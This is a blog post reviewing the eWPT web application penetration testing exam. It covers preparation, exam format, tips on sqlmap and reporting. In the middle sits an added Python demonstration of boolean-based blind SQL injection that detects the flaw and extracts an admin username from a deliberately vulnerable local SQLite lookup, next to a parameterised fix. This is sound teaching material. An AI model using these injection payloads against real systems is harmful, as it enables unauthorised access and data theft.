So the goal I had for 2022 was to focus more on certifications that are hands-on and can challenge my skillset. Why? Theoretical certifications do have their use, but the more hands-on the cert, the more relevant it is to my Security Engineer role. It offers more value from a learning standpoint and, let's face it, it can even give you additional attack vectors to try when testing applications. So with that said, let's dive right in!
I was tempted to jump right into the exam as I was a bit overconfident. I resisted the urge and decided to do some preparation instead. Let me just say, I am happy I did. If you're fortunate and have access to the INE courses, that is literally all you need to pass. The material is somewhat outdated (it still covers Flash security), but it essentially has all you need. The labs are an added bonus to flex your skills, as there are tasks for which no solutions are given, so your creative thinking is a big factor. If you are not as fortunate in having access to INE, there are a lot of free resources that can assist. I took a look at this GitHub repository, which compiled useful resources for passing the exam. Practicing on Hack The Box also offers some level of comfort for the exam. Whichever route you take, take notes! I cannot stress this enough: simple flashcards save you so much time compared to going back through a lesson in its entirety.
When you start your exam you are given a letter of engagement, which also states your objective. Please note the objective is a necessary condition to pass, but it alone is not sufficient. You get 14 days, split evenly down the middle: 7 days for testing and an additional 7 for reporting. In most cases, I think anyone will be finished before the 14-day period is up. Do not treat this exam as a CTF. It isn't! It is focused on writing a comprehensive penetration test report covering all, or at least most, of the vulnerabilities in the environment. You need to put in a considerable amount of effort to pass the eWPT, but you can safely focus your efforts on the course materials from INE or the resources mentioned earlier and go at your own pace while doing the exam. There were times when the exam environment was unstable and I had to refresh it at different moments, but outside of that it was a pretty good experience. If for any reason you think you may be on the verge of failing, fret not: you get a free exam retake. This gives you an additional seven days to read what your exam reviewer noted and correct where you went wrong.
1. There are several paths to achieving the objective of the exam.
2. Report every finding you come upon. Do not assume a finding is insignificant.
3. Eat, breathe, and sleep sqlmap. It automates the discovery and exploitation of SQL injection (it does not test for XSS, so cover that separately). In particular, make sure you understand what each option of the sqlmap command you rely on actually does, rather than copying it blindly.
4. Enumeration is key.
5. Understand the application's inner architecture while testing and pay attention to file paths.
6. Outline clearly in your report how you achieved the objective.
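To make the sqlmap tip concrete, here is an added example that is not from the original post or from the eWPT course: it reproduces, by hand, the boolean-based blind differential that sqlmap automates, first to decide whether an endpoint is injectable and then to pull a value out of the database one character at a time. The target is a constructed in-memory SQLite table with a deliberately vulnerable lookup next to its parameterised fix; the table name, rows and function names are assumptions for illustration only, and `unicode()`/`substr()` are SQLite built-ins that sqlmap would swap for the equivalents of whichever backend it fingerprints.

```python
import sqlite3

# Constructed in-memory backend standing in for an exam target (assumption; not the
# eWPT lab). The table, rows and function names below are illustrative only.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user")])
    return conn

def vulnerable_lookup(conn, username):
    """Deliberately vulnerable: the untrusted value is spliced into the SQL string."""
    sql = f"SELECT role FROM users WHERE username = '{username}'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # a broken query shows up as 'no result', like an error page would
    return row[0] if row else None

def hardened_lookup(conn, username):
    """Same lookup with a bound parameter; the input can never change the query shape."""
    row = conn.execute("SELECT role FROM users WHERE username = ?", (username,)).fetchone()
    return row[0] if row else None

def detect_boolean_sqli(lookup, known_value):
    """Boolean-based blind check: a TRUE-tail payload must leave the response unchanged
    while a FALSE-tail payload must change it. This differential is the heart of what
    sqlmap automates; lookup(value) returns whatever the page shows for that input."""
    baseline = lookup(known_value)
    if baseline is None:
        return False  # need a known-good value to compare against
    true_tail = lookup(f"{known_value}' AND 1=1--")
    false_tail = lookup(f"{known_value}' AND 1=2--")
    return true_tail == baseline and false_tail != baseline

def blind_extract(lookup, known_value, subquery, max_len=32):
    """Recover the result of `subquery` one character at a time through the oracle.
    Each probe asks 'is character N of the result equal to code C?' and reads the answer
    from whether the page still shows the baseline content."""
    recovered = ""
    for pos in range(1, max_len + 1):
        matched = None
        for code in range(32, 127):  # printable ASCII
            payload = f"{known_value}' AND unicode(substr(({subquery}),{pos},1))={code}--"
            if lookup(payload) is not None:
                matched = chr(code)
                break
        if matched is None:
            break  # past the end of the string: substr() gives '' and unicode('') is NULL
        recovered += matched
    return recovered

if __name__ == "__main__":
    conn = make_db()
    vuln = lambda v: vulnerable_lookup(conn, v)
    safe = lambda v: hardened_lookup(conn, v)
    print("vulnerable endpoint injectable:", detect_boolean_sqli(vuln, "alice"))
    print("hardened endpoint injectable:  ", detect_boolean_sqli(safe, "alice"))
    print("admin username via blind SQLi: ",
          blind_extract(vuln, "alice", "SELECT username FROM users WHERE role='admin'"))
```

Run it and the vulnerable endpoint is flagged while the parameterised one is not, and the admin username is recovered purely from "did the page change" answers. That is exactly the behaviour sqlmap's `--technique=B` path relies on, which is why understanding it makes its output (and its false positives on pages that vary between requests) much easier to judge during the exam.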
This is always something we as security professionals tend to run from; the documentation side of things is always a turn-off. Unfortunately, the report is one of the primary things we get paid for, so it is necessary. The TCM Reporting Template is one of the best templates you could use to fill in your findings, and there are LaTeX templates as well. Reporting is tedious, but with the help of the above-mentioned templates, or any you may have found in the wild, the process becomes a breeze.
Overthinking began to kick in when I thought I was done: submit, or test some more? Ultimately I decided to submit. The report had 22 issues and was 62 pages long without the fluff. It took me a day and a half to complete testing and reporting, but the waiting that followed is absolutely nerve-wracking. It took me almost 3 weeks to get the e-mail saying I had successfully passed. eLearnSecurity does advise that it takes about 30 days or less to review your report, which is in keeping with having a security professional review it to see if it meets their standards. The exam was a good experience and I would recommend it to any upcoming or even seasoned Web Application Penetration Tester looking to flex their skills. The exam is not proctored and, based on my research, it isn't an exam that is randomized (the exam content isn't static). So having someone take the exam for you is very much possible. I don't condone any of this, but it does give fuel to the ongoing debate on proctored vs. unproctored cyber security exams; I may do a deep dive on this in another blog post. With that said, I encourage anyone interested in the Cyber Security space to attempt this certification.